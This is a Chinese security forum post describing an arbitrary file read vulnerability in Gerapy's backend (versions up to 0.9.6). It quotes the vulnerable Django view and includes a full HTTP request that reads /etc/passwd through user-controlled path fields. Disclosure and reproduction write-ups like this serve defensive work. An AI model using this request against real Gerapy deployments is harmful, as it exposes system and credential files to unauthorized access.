问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Gerapy read 后台任意文件读取漏洞
# Gerapy read 后台任意文件读取漏洞 ## 漏洞描述 Gerapy gerapy/server/core/views.py 中的 project_file_read 方法存在任意文件读取,攻击者登录后台后发送特定的请求包即可利用漏洞...
Gerapy read 后台任意文件读取漏洞 ====================== 漏洞描述 ---- Gerapy gerapy/server/core/views.py 中的 project\_file\_read 方法存在任意文件读取,攻击者登录后台后发送特定的请求包即可利用漏洞 漏洞影响 ---- Gerapy <= 0.9.6 网络测绘 ---- title="Gerapy" 漏洞复现 ---- 登录页面 ![img](https://shs3.b.qianxin.com/butian_public/f590765db28632402b8a5ff5539fe84f3e76a79ea6f04.jpg) 出现漏洞的文件为 `gerapy/server/core/views.py` ![img](https://shs3.b.qianxin.com/butian_public/f58998365a94dc264bcc0add5f9b3bc09806ae21449a7.jpg) ```python @api_view(['POST']) @permission_classes([IsAuthenticated]) def project_file_read(request): """ get content of project file :param request: request object :return: file content """ if request.method == 'POST': data = json.loads(request.body) path = join(data['path'], data['label']) # binary file with open(path, 'rb') as f: return HttpResponse(f.read().decode('utf-8')) ``` 参数 path 和 label 都为用户可控变量,登录后构造请求包 ```python POST /api/project/file/read HTTP/1.1 Host: Content-Length: 35 Accept: application/json, text/plain, */* Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Content-Type: application/json;charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 x-forwarded-for: 127.0.0.1 x-originating-ip: 127.0.0.1 x-remote-ip: 127.0.0.1 x-remote-addr: 127.0.0.1 Connection: close {"path":"/etc/", "label":"passwd"} ``` ![img](https://shs3.b.qianxin.com/butian_public/f799319c7f95a37ea2f9413fa4a952dec461ddb64c7f5.jpg)
发表于 2024-07-12 18:46:04
阅读 ( 968 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!